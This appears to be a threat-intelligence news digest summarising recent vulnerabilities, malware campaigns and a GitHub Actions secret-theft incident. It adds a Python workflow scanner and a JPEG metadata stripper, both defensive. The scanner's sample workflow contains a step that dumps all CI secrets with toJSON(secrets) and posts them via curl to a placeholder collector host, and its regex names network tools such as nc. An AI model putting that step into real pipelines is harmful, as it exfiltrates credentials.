A security researcher earned $43,000 from Google for discovering a critical Chrome vulnerability in the ServiceWorker component (CVE-2025-10200). The vulnerability prompted a Chrome update to fix the issue, but it is unclear whether it has been actively exploited in the wild. #CVE-2025-10200 #ChromeUpdate…
Tag: MACOS
Researchers from ETH Zurich have uncovered a new Spectre-BTI attack, VMScape, that leaks sensitive memory and cryptographic keys across the guest-host boundary in virtualized environments by exploiting insufficient isolation of branch-predictor state between a VM and its hypervisor. The flaw affects AMD Zen CPUs and older Intel processors, underscoring the need for updated mitigations and patches in cloud infrastructure…
Samsung has fixed a critical remote code execution vulnerability (CVE-2025-21043) affecting Android devices, which was exploited in real-world attacks. Additionally, WhatsApp patched a zero-click vulnerability (CVE-2025-55177) linked with sophisticated spyware campaigns. #CVE202521043 #CVE202555177
Daily Recap: a Spectre-like VMScape flaw threatens guest-host isolation on AMD/Intel CPUs, while exploitation of SonicWall CVE-2024-40766 enables breaches and firewall crashes. Other highlights include the EggStreme, ChillyHell and AsyncRAT campaigns and the JLR data theft, along with notable supply chain and privacy concerns around NPM, browser extensions, and keystroke tracking. #VMScape #SonicWallFlaw #EggStreme #ChillyHell #AsyncRAT #JLRAttack #NPMAttack #KeystrokeTracking
Healthcare organizations faced a sustained surge of ransomware attacks in 2025 that disrupted operations, delayed patient care, and exposed millions of records. Prominent families including INC, INTERLOCK, Akira, Qilin, RansomHub, and Warlock targeted hospitals worldwide, gaining access through phishing and exploited CVEs and then relying on Cobalt Strike, Mimikatz, and Rclone to persist, steal credentials, and exfiltrate data for extortion. #INC #INTERLOCK
ChillyHell is a sophisticated macOS backdoor that remained undetected for years despite being code-signed with a developer certificate and notarized by Apple. Its modular design and multiple persistence methods make it a flexible and potentially dangerous threat to targeted systems. #ChillyHell #UNC4487…
DeepProbe is an open-source framework that automates memory forensics analysis across multiple operating systems, providing analysts with actionable forensic artifacts. It enhances detection accuracy by correlating anomalies, applying baselines, and mapping findings to the MITRE ATT&CK framework. #DeepProbe #MemoryForensics
Cybersecurity researchers have identified two new malware families: CHILLYHELL, an Apple macOS backdoor, and ZynorRAT, a Go-based remote access Trojan targeting Windows and Linux. These threats demonstrate advanced persistence tactics and the use of social engineering via websites and Telegram bots. #CHILLYHELL #ZynorRAT…
Modern Threat Intelligence feeds contain numerous indicators, but their relevance varies greatly depending on the sector and environment. The MATCH-4 Intelligence Ratio Model helps focus on high-confidence indicators by considering language, location, systems, and sector relevance, improving threat detection efficiency. #ThreatFeeds #Match4Model
On September 2, 2025, an attacker compromised multiple GitHub accounts and injected malicious GitHub Actions workflows that exfiltrated CI/CD secrets (PyPI, NPM, DockerHub and GitHub tokens, among others) to hxxps://bold-dhawan.45-139-104-115.plesk.page, leaking 3,325 secrets across hundreds of repositories. Rapid disclosure and remediation by GitGuardian, the affected maintainers, and the registries (a PyPI read-only action and reports to GitHub, NPM and PyPI) limited the impact, and no malicious PyPI releases were observed. #FastUUID #bold-dhawan
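A check maintainers can run over their own workflow files after an incident of this kind, written as an added example for this page and not taken from GitGuardian or any affected project: it splits a workflow into steps and flags any step that references secrets and calls an HTTP client against a host outside an assumed allowlist, or that serialises the whole secrets context with toJSON(secrets). The allowlist, the sample workflow and its collector hostname are all constructed for the example.

```python
import re
from typing import Dict, List

# Hosts a token-holding step may legitimately talk to. This allowlist is an
# assumption for the example; tune it to the registries your pipelines use.
ALLOWED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org",
                 "registry.npmjs.org", "index.docker.io"}

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}")
# toJSON(secrets) serialises every secret the job can see: the "dump them all" pattern.
DUMP_ALL = re.compile(r"toJSON\(\s*secrets\s*\)", re.IGNORECASE)
HTTP_CLIENT = re.compile(r"\b(curl|wget|Invoke-WebRequest|Invoke-RestMethod|nc|ncat)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")


def split_steps(workflow: str) -> List[Dict[str, str]]:
    """Cut a workflow into steps. A step starts at a line whose first non-blank
    characters are "- ". Good enough for this example; a real scanner should
    load the YAML properly (nested lists under `with:` would confuse this)."""
    steps: List[Dict[str, str]] = []
    current = None
    named = False
    for line in workflow.splitlines():
        if line.lstrip().startswith("- "):
            current = {"name": line.strip()[2:], "body": ""}
            steps.append(current)
            named = False
        if current is None:
            continue  # workflow/job header lines before the first step
        current["body"] += line + "\n"
        m = re.match(r"\s*(?:-\s*)?name:\s*(.+)", line)
        if m and not named:
            current["name"] = m.group(1).strip()
            named = True
    return steps


def scan_workflow(workflow: str, allowed_hosts=ALLOWED_HOSTS) -> List[Dict[str, object]]:
    """Flag steps that both reference secrets and reach a host outside the
    allowlist, plus any step that dumps the whole secrets context."""
    findings: List[Dict[str, object]] = []
    for step in split_steps(workflow):
        body = step["body"]
        reasons = []
        hosts = sorted({h.lower() for h in URL_HOST.findall(body)})
        foreign = [h for h in hosts if h not in allowed_hosts]
        if DUMP_ALL.search(body):
            reasons.append("toJSON(secrets) exposes every secret the job can read")
        if (SECRET_REF.search(body) or DUMP_ALL.search(body)) \
                and HTTP_CLIENT.search(body) and foreign:
            reasons.append("secret-bearing step sends HTTP to non-allowlisted host(s): "
                           + ", ".join(foreign))
        if reasons:
            findings.append({"step": step["name"], "hosts": foreign, "reasons": reasons})
    return findings


# Constructed sample workflow for this example; the collector hostname is a
# placeholder, not the domain from the real incident.
SAMPLE_WORKFLOW = """\
name: release
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish
        run: twine upload dist/*
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_TOKEN }}
      - name: Comment on PR
        run: >
          curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}"
          https://api.github.com/repos/org/repo/issues/1/comments -d '{"body":"built"}'
      - name: Security check
        env:
          DUMP: ${{ toJSON(secrets) }}
        run: |
          curl -s -X POST -d "$DUMP" https://collector.example.invalid/collect
"""

if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"[!] step {f['step']!r}: " + "; ".join(f["reasons"]))
```

Only the "Security check" step is reported: "Publish" holds a token but never calls an HTTP client, and "Comment on PR" sends its token to api.github.com, which is on the allowlist. Run this over every file under .github/workflows in every repository a compromised account could push to, and treat a hit on a workflow that was added in a single unreviewed commit as an incident, not a lint warning.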
KuCoin’s security team uncovers a sophisticated Lazarus Group phishing campaign targeting financial and crypto organizations through fake interviews, poisoned code, and exploiting recent vulnerabilities. The campaign demonstrates Lazarus’s evolving tactics, including social engineering, supply chain attacks, and malware deployment. #LazarusGroup #APT38 #CryptoTargeting…
Researchers have uncovered a malicious campaign targeting EU IT workers, delivering fake GitHub Desktop installers via sophisticated malvertising tactics. The campaign leverages GPU-based decryption and evasion techniques to evade detection and enables potential credential theft and lateral movement. #GPUGate #AtomicStealer…
Removing metadata from files, including images and documents, helps protect privacy when sharing them. The article lists methods and tools for cleaning metadata across devices and platforms, while noting their limitations and security considerations.
#metadata #Exif #ExifTool #MetadataCleaner #Tails
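As an added example that is not part of the article (which points to tools such as ExifTool rather than showing code), here is a minimal JPEG segment walker that lists and strips the metadata-carrying APP segments: APP1 (Exif and XMP) and APP13 (Photoshop/IPTC). It keeps APP0 (JFIF) and everything from the scan onward, so the picture itself is untouched. The sample bytes are constructed in the block and are not a viewable image.

```python
import struct
from typing import Iterator, List, Tuple

SOI, EOI, SOS = 0xFFD8, 0xFFD9, 0xFFDA
APP0, APP1, APP13 = 0xFFE0, 0xFFE1, 0xFFED
# APP1 carries Exif (camera model, GPS, timestamps) and XMP; APP13 carries
# Photoshop/IPTC records. APP0 (JFIF) stays because decoders expect it.
METADATA_MARKERS = {APP1, APP13}


def iter_segments(data: bytes) -> Iterator[Tuple[int, int, int]]:
    """Yield (marker, start, end) for each segment up to SOS. The SOS segment
    is yielded with end=len(data): the entropy-coded scan and the trailing EOI
    are treated as one opaque tail and never parsed."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    yield SOI, 0, 2
    pos = 2
    while pos + 4 <= len(data):
        while pos + 1 < len(data) and data[pos] == 0xFF and data[pos + 1] == 0xFF:
            pos += 1  # skip optional 0xFF fill bytes between segments
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = (data[pos] << 8) | data[pos + 1]
        if marker == SOS:
            yield marker, pos, len(data)
            return
        # the 16-bit length counts itself but not the 2-byte marker
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        end = pos + 2 + length
        yield marker, pos, end
        pos = end
    raise ValueError("truncated JPEG: no SOS found")


def metadata_segments(data: bytes) -> List[str]:
    """Name the metadata segments present, in file order."""
    found = []
    for marker, start, end in iter_segments(data):
        payload = data[start + 4:end]
        if marker == APP1 and payload.startswith(b"Exif\x00"):
            found.append("Exif")
        elif marker == APP1 and payload.startswith(b"http://ns.adobe.com/xap/1.0/"):
            found.append("XMP")
        elif marker == APP1:
            found.append("APP1")
        elif marker == APP13:
            found.append("APP13/IPTC")
    return found


def strip_metadata(data: bytes) -> bytes:
    """Copy every segment except the metadata-carrying APP segments."""
    out = bytearray()
    for marker, start, end in iter_segments(data):
        if marker not in METADATA_MARKERS:
            out += data[start:end]
    return bytes(out)


def _segment(marker: int, payload: bytes) -> bytes:
    return struct.pack(">HH", marker, len(payload) + 2) + payload


# Constructed JPEG-shaped sample: valid marker structure, junk scan data.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(APP1, b"Exif\x00\x00MM\x00\x2a\x00\x00\x00\x08" + b"GPS-ish bytes")
    + _segment(APP1, b"http://ns.adobe.com/xap/1.0/\x00<x:xmpmeta/>")
    + _segment(APP13, b"Photoshop 3.0\x008BIM")
    + _segment(0xFFDB, b"\x00" + bytes(64))        # DQT placeholder
    + _segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\x56"                               # fake scan data
    + b"\xff\xd9"                                   # EOI
)

if __name__ == "__main__":
    print("before:", metadata_segments(SAMPLE_JPEG))
    cleaned = strip_metadata(SAMPLE_JPEG)
    print("after: ", metadata_segments(cleaned),
          f"({len(SAMPLE_JPEG) - len(cleaned)} bytes removed)")
```

ExifTool does the same across many formats with `exiftool -all= photo.jpg`. Two caveats a practitioner should keep in mind: by default ExifTool leaves a `photo.jpg_original` backup beside the file (pass `-overwrite_original` to avoid it), so the metadata is still on disk until that copy is gone; and each container has its own metadata slots (PNG text chunks, PDF document info, Office document properties), so a JPEG-only stripper like the one above says nothing about other file types.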
Validin re-tested pivoting and threat-hunting techniques from four recent blog posts (Laundry Bear, phishing/HTTP features, Transparent Tribe, and BlueNoroff) to see which methods still produce novel indicators and active infrastructure. Host response, header/body/hash, DNS/IP, and registration pivots remained fruitful in many cases, producing new domains, IPs, and certificate-based links, while some specific pivots (favicons, title tags, wildcard subdomains) aged out faster. #LaundryBear #TransparentTribe #BlueNoroff
On 19 August 2025 Arctic Wolf Labs disclosed a campaign in which attackers used Google Ads and GitHub commit-specific pages to redirect victims to a trojanized GitHub Desktop installer that deploys a GPU-gated decryption loader dubbed "GPUGate." The campaign delivers a 128 MB MSI with embedded modules and a GPU/OpenCL key-generation routine that prevents execution in many sandboxes, and it targets Western European IT workers. #GPUGate #AMOS_Stealer